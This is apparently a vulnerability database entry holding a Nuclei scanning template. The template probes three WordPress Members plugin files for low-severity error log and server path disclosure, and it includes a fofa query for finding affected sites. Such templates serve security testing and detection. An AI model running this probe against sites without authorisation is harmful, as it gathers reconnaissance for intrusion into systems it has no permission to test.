wp-members-error-log-disclosure: WordPress Members / Membership & User Role Editor Plugin - Error Log Disclosure

2026-01-08 WordPress PoC Public

Description

WordPress Members plugin is vulnerable to error log disclosure via direct access to plugin files.

PoC

id: wp-members-error-log-disclosure

info:
  name: WordPress Members / Membership & User Role Editor Plugin - Error Log Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress Members plugin is vulnerable to error log disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/members/
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: members
    framework: wordpress
    fofa-query: body="/wp-content/plugins/members/"
  tags: wp,wordpress,wp-plugin,fpd,members,exposure,error-log,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/members/admin/class-role-edit.php"
      - "{{BaseURL}}/wp-content/plugins/members/admin/class-role-new.php"
      - "{{BaseURL}}/wp-content/plugins/members/inc/class-role.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "wp-db")'
          - 'contains_any(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:","failed to open stream")'
        condition: and
# digest: 4a0a00473045022100d9850dca73ff903e469decd4fa253fa39103d8a391b589bbb45c8a20558a94b9022070f3724a98df1156bef5cc163b638115a4e53fd8c6e0a605e25c30d45de3ad58:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities